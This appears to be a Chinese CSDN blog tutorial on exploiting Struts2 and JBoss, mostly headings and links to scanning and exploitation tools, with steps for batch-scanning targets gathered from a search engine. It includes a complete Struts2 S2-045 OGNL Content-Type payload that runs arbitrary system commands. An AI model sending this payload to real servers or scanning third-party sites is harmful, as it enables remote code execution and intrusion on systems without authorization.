常见漏洞之 struts2+ jboss

已于 2023-05-23 17:45:27 修改
阅读量660 收藏
点赞数
分类专栏: 网络安全 文章标签: 安全
于 2023-02-11 22:36:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263566/article/details/128985152
版权

数据来源

        本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。 

01  Struts2相关介绍

》Struts2概述

》Struts2历史漏洞(1)

》Struts2历史漏洞(2)  

》Struts2历史漏洞(3)  

》Struts2历史漏洞(4) 

》Struts2历史漏洞(5)

》Struts2历史漏洞(6) 

》Struts2历史漏洞(2019) 

02 Strut2 识别与漏洞利用

》Struts2框架识别(1)

》Struts2框架识别(2)

》Struts2漏洞验证

Struts2漏洞检查工具2018

struts2综合漏洞扫描工具_struts2漏洞检测工具_虚无-缥缈的博客-CSDN博客

》Struts2-045漏洞介绍

》Struts2-045漏洞危害

》Struts2-045漏洞利用(执行命令)

随意上传一个文件井抓包,修改 Content-type为以下的内容

Content-Type:"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

#cmd='whoami'   可以改成其他系统命令,如:ipconfig、dir、......

》Struts2-045漏洞利用(反弹shell)

03 Jboss相关介绍

》Jboss概述

》Jboss历史漏洞(访问控制不严导致的漏洞)

》Jboss历史漏洞(反序列化漏洞)

04 Jboss识别与漏洞利用

》Jboss组件识别

访问网站的8080端口出现类似下面的页面就是使用了Jboss组件

》Jbos漏洞检测(批量)

GitHub - GGyao/jbossScan: 扫描jboss常见漏洞路径是否存在。

使用示例:

1)先把脚本代码从github上拉下来

2)把要扫描的目标url写进target.txt文件中,一行一个

这个目标网站是从钟馗之眼找的

3)扫描漏洞

这个使用python3运行脚本,kali上自带,windows系统要自行安装

 我的python运行文件的名称就是python所以这个我用python执行命令,也可以更改文件名为python3然后就可以使用python3执行命令

python jbossScan.py

》CVE-2017-12149漏洞检测

/invoker/readonly

CVE-2017-12149漏洞概述

》CVE-2017-12149漏洞利用(反弹shell)

GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool

狗蛋的博客之旅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
开发知识点-Apache Struts2框架
aming小老弟
03-08 801
【代码】开发知识点-Apache Struts2框架。
jbossstruts漏洞解决
08-13
本文主要针对两个常见漏洞——JBoss漏洞Struts漏洞,详述其情况、影响以及解决方案,旨在帮助用户理解漏洞的危害并采取有效的防护措施。 首先,让我们关注Struts漏洞Struts2是一个广泛使用的Java企业级Web...
Struts2及jboss漏洞利用工具
08-06
Struts2及jboss漏洞利用工具。非常好用本人几经尝试过。 Struts2的漏洞实用工具 ,以及jboss的jar cmd运行代码,良心出品
深入浅出带你学习JBoss中间件常见漏洞
qq_44005305的博客
01-02 1937
本文给大家带来的是JBOSS中间件漏洞的总结,详细讲解一下JBOSS中间件的常见漏洞以及利用方法,本文就着JBOSS中间件的特性来分析该中间件的常见漏洞利用方式,下面我们展开文章来讲。简单来说可以介绍为一个开源的符合J2EE规范的应用服务器,作为J2EE规范的补充,Jboss中引入了AOP框架,为普通Java类提供了J2EE服务,而无需遵循EJB规范。该中间件的特点如下:它将具有革命性的JMX微内核服务作为其总线结构;
Kali Linux渗透基础知识整理(三):漏洞利用
weixin_34056162的博客
08-05 917
漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透。网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的。顾名思义,利用漏洞,达到攻击的目的。 Metasploit Framework rdesktop  + hydra Sqlmap Arpspoof tcpdump + ferret + hamster Ettercap SET Metasploit Frame...
Struts2插件下载地址及简介
Mr_Von的专栏
09-10 1661
以下是各个插件简介及下载地址: http://cwiki.apache.org/S2PLUGINS/home.html
[旧文系列] Struts2历史高危漏洞系列-part6:S2-059/S2-061
mole_exp的博客
01-18 1386
文章目录关于<旧文系列>前言S2-059漏洞复现与分析可回显PoC漏洞修复S2-061漏洞复现与分析可回显PoC漏洞修复小结Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 https://forum.butian.net
Web中间件常见漏洞总结
小小猪的博客
11-17 1922
一、IIS中间组件: 1、PUT漏洞 2、短文件名猜解 3、远程代码执行 4、解析漏洞 二、Apache中间组件: 1、解析漏洞 2、目录遍历 三、Nginx中间组件: 1、文件解析 2、目录遍历 3、CRLF注入 4、目录穿越 四、Tomcat中间组件: 1、远程代码执行 2、war后门文件部署 五、jBoss中间组件: 1、反序列化漏洞 2、war后门文件部署 六、WebLogic中间组件: 1、反序列化漏洞 2、SSRF 3、任意文件上传 4、war后门文
渗透测试之常见的web漏洞分析
qq_41814777的博客
10-05 1121
0x00 常见的web漏洞分类: SQL注入漏洞 文件上传漏洞 XSS 跨站脚本攻击 CSRF 跨站请求伪造攻击 文件包含漏洞 命令执行漏洞 代码注入攻击 逻辑漏洞 0x01 SQL注入漏洞 定义:通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注入基础-数据库基础: 数据库结构  库(...
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
安全运维那些漏洞(目录版)
12-01
struts漏洞 Web服务器未及时打补丁,有解析漏洞 PHP-CGI RCE FCK编辑器 server-status信息泄露 网站备份文件放在web目录,可被下载 列目录导致可看到敏感数据并查看 snmp信息泄露 weblogic弱口令 SVN信息泄露 域传送...
web安全漏洞加固手册
06-22
Struts2 远程命令执行是指攻击者可以通过 Struts2 漏洞来执行恶意命令。解决这个问题的方法是升级 Struts2 到最新版本,限制命令的执行权限,并且对命令执行日志进行监控来检测恶意命令。 1.2.2 Jboss 远程代码执行...
Web漏洞检测及修复方案.doc
05-17
包括 Struts2 远程命令执行、Jboss 远程代码执行、HTTP.sys 远程代码执行漏洞等。解决方法是使用强的命令执行机制,确保每个用户只能执行其授权的命令。 Struts2 远程命令执行是指攻击者可以远程执行 Struts2 的...
Web安全攻防之常见漏洞及防御方式
读万卷书,行万里路。
01-27 397
1 SSRF SSRF漏洞的产生原因:服务器提供了从其他服务器获取数据的功能,并且没有对地址和协议进行过滤和限制。比如:2020年10月ByteCTF的easy_scrapy。 这种漏洞在CTF中也很常见,可以用来攻击内网中的应用,如:Redis、discuz7、fastcgi、memcache、webdav、strutsjboss、axis2等应用。 防御方式: 限制请求的端口只能是Web端口 限制不能访问内网的IP(IPTable) 屏蔽返回的内容 参考文章: 浅析SSRF原理及利用方式:htt
JBoss常见漏洞整理
热门推荐
寒星的博客
06-01 1万+
JBoss常见漏洞整理 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 JBoss高危漏洞主要涉及到以下两种。 第一种是利用未授权访问进入JBoss后台进行文件上传的漏洞,例如:CVE-2007-1036,CVE-2010-0738,CVE-2006.
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 170
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 148
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
tomcat weblogic jboss 漏洞
12-16
在互联网上,Tomcat、WebLogic和Jboss都是常见的应用服务器。由于它们在网站和应用中的广泛使用,这些服务器可能会存在漏洞。在过去的几年中,这些应用服务器都曾发生过漏洞事件。 Tomcat是一个由Apache基金会开发的开源Java Servlet容器,它可用于部署和管理Java应用程序。在过去,Tomcat曾经发生过一些安全漏洞,例如路径遍历漏洞和身份验证绕过漏洞。这些漏洞有可能导致黑客可以利用Tomcat服务器来执行恶意代码或窃取敏感信息。 WebLogic是Oracle公司开发的企业级Java应用服务器,供企业用于构建和部署企业级应用程序。在过去,WebLogic也曾发生过一些漏洞事件,例如XMLDecoder漏洞和未经授权的远程攻击漏洞。这些漏洞可能会导致黑客远程控制服务器或获取敏感数据。 Jboss是一款开源的Java应用服务器,它广泛用于企业级应用程序的构建和部署。过去,Jboss也存在过一些漏洞,比如JMX控制台未授权访问漏洞和远程代码执行漏洞。这些漏洞可能会被利用来执行恶意操作和窃取数据。 为了防止这些漏洞对系统造成危害,用户应该及时安装官方发布的补丁和更新,加强服务器的安全配置,限制对服务器的访问权限,定期进行安全审计和漏洞扫描。同时,开发人员也应该编写健壮安全的代码,以减少在应用程序中发现漏洞的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狗蛋的博客之旅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值